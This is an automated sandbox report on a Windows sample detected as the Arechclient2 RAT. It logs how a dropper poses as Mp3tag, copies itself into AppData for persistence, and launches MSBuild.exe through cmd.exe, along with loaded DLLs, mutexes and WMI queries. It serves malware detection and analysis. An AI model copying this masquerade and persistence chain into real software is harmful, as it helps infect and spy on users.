                            Source: C:\Users\user\AppData\Local\Temp\lcqqpedjyaav, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 11.2.cmd.exe.54400c8.7.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                            Source: 16.2.cmd.exe.58000c8.7.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/28@1/1
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390C1C18 GetLastError,FormatMessageW,5_2_00007FF7390C1C18
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390D405C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,5_2_00007FF7390D405C
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeFile created: C:\Users\user\AppData\Roaming\DownloadpluginJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\e72514ca91fc4303a01342e0f709e917
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\BijouterieJump to behavior
                            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\win.iniJump to behavior
                            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: Mp3tag.exe, 00000007.00000002.1386873220.00000001407FC000.00000002.00000001.01000000.00000009.sdmp, Mp3tag.exe, 00000007.00000000.1301371036.00000001407FC000.00000002.00000001.01000000.00000009.sdmp, Mp3tag.exe, 00000009.00000000.1380222016.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 00000009.00000002.1517151205.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 0000000F.00000002.1823779476.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 0000000F.00000000.1702287790.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe.7.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                            Source: Mp3tag.exe, 00000007.00000002.1386873220.00000001407FC000.00000002.00000001.01000000.00000009.sdmp, Mp3tag.exe, 00000007.00000000.1301371036.00000001407FC000.00000002.00000001.01000000.00000009.sdmp, Mp3tag.exe, 00000009.00000000.1380222016.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 00000009.00000002.1517151205.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 0000000F.00000002.1823779476.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 0000000F.00000000.1702287790.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe.7.drBinary or memory string: select * from albums where artist like ? and album like ?;
                            Source: Mp3tag.exe, 00000007.00000002.1386873220.00000001407FC000.00000002.00000001.01000000.00000009.sdmp, Mp3tag.exe, 00000007.00000000.1301371036.00000001407FC000.00000002.00000001.01000000.00000009.sdmp, Mp3tag.exe, 00000009.00000000.1380222016.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 00000009.00000002.1517151205.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 0000000F.00000002.1823779476.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 0000000F.00000000.1702287790.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe.7.drBinary or memory string: insert into `albums` values(?, ?, ?, ?, ?, ?, ?);
                            Source: Mp3tag.exe, 00000007.00000002.1386873220.00000001407FC000.00000002.00000001.01000000.00000009.sdmp, Mp3tag.exe, 00000007.00000000.1301371036.00000001407FC000.00000002.00000001.01000000.00000009.sdmp, Mp3tag.exe, 00000009.00000000.1380222016.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 00000009.00000002.1517151205.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 0000000F.00000002.1823779476.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 0000000F.00000000.1702287790.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe.7.drBinary or memory string: select * from albums where album like ?;
                            Source: Mp3tag.exe, 00000007.00000002.1386873220.00000001407FC000.00000002.00000001.01000000.00000009.sdmp, Mp3tag.exe, 00000007.00000000.1301371036.00000001407FC000.00000002.00000001.01000000.00000009.sdmp, Mp3tag.exe, 00000009.00000000.1380222016.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 00000009.00000002.1517151205.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 0000000F.00000002.1823779476.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 0000000F.00000000.1702287790.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe.7.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                            Source: Mp3tag.exe, 00000007.00000002.1386873220.00000001407FC000.00000002.00000001.01000000.00000009.sdmp, Mp3tag.exe, 00000007.00000000.1301371036.00000001407FC000.00000002.00000001.01000000.00000009.sdmp, Mp3tag.exe, 00000009.00000000.1380222016.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 00000009.00000002.1517151205.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 0000000F.00000002.1823779476.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 0000000F.00000000.1702287790.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe.7.drBinary or memory string: create table albums (discid varchar(255) not null, tracks int not null, length int not null, tone int not null, genre int not null, artist varchar(255), album varchar(255));
                            Source: Mp3tag.exe, 00000007.00000002.1386873220.00000001407FC000.00000002.00000001.01000000.00000009.sdmp, Mp3tag.exe, 00000007.00000000.1301371036.00000001407FC000.00000002.00000001.01000000.00000009.sdmp, Mp3tag.exe, 00000009.00000000.1380222016.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 00000009.00000002.1517151205.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 0000000F.00000002.1823779476.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe, 0000000F.00000000.1702287790.00000001407FC000.00000002.00000001.01000000.0000000C.sdmp, Mp3tag.exe.7.drBinary or memory string: select * from albums where artist like ?;
                            Source: Mp3tag.exeString found in binary or memory: wild-stop-dirs
                            Source: Mp3tag.exeString found in binary or memory: more-help
                            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exe "C:\Users\user~1\AppData\Local\Temp\Bijouterie\Mp3tag.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeProcess created: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe "C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe"
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exe "C:\Users\user~1\AppData\Local\Temp\Bijouterie\Mp3tag.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeProcess created: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: dxgidebug.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: oledlg.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: oleacc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: tak_deco_lib.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: pla.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: pdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: tdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: shdocvw.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: oledlg.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: oleacc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: tak_deco_lib.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: pla.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: pdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: tdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: shdocvw.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: oledlg.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: oleacc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: tak_deco_lib.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: pla.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: pdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: tdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: shdocvw.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                            Source: ihcsdpxxtwvodu.11.drLNK file: ..\..\..\..\user\AppData\Roaming\Downloadplugin\Mp3tag.exe
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
                            Source: file.exeStatic file information: File size 6821123 > 1048576
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: pbBuf != NULLlnLength != 0SZipFile::AppendCentralDirFileHeaderpOut != NULLY:\projects\_main\SZipFile.cppSZipFile::AllocateNewDataBlockastrInFilePaths[i]astrInFilePaths.size() != 0_S_FALSE(m_zf.bZipFileOpen)strOutFilePathSZipFile::CompressFilesAbspbCopyTo != NULLpdb->pdbNext != NULLrcdc.pdbFirst != NULL && rcdc.pdbLast != NULLSZipFile::DeleteDataBlocksdwLength <= 4readastrInFileNames[i]astrInFileNames.size() != 0SZipFile::CompressFilesRelpfileIn != NULLrb_S_FALSE(m_zf.bSubFileOpen)_S_TRUE(m_zf.bZipFileOpen)strGlobalCommentSZipFile::ZipCloseSZipFile::SZipFilehFind != INVALID_HANDLE_VALUE_S_FALSE(strFilePath.IsEmpty())SZipFile::GetFileTimem_zf.sfi.dwLocalFileHeaderPos != _S_NUM_MAXDWORDlpszFilePathlpszCommentSZipFile::ZipCreateSubFiledwOldPos != _S_NUM_MAXDWORD_S_TRUE(m_zf.bSubFileOpen)SZipFile::ZipCloseSubFiledwPosCentralDir != _S_NUM_MAXDWORDSZipFile::ZipWriteSubFilem_zf.dwStartPos != _S_NUM_MAXDWORDwbSZipFile::ZipOpen1.3.1m_zf.sfi.pbCentralDirFileHeader != 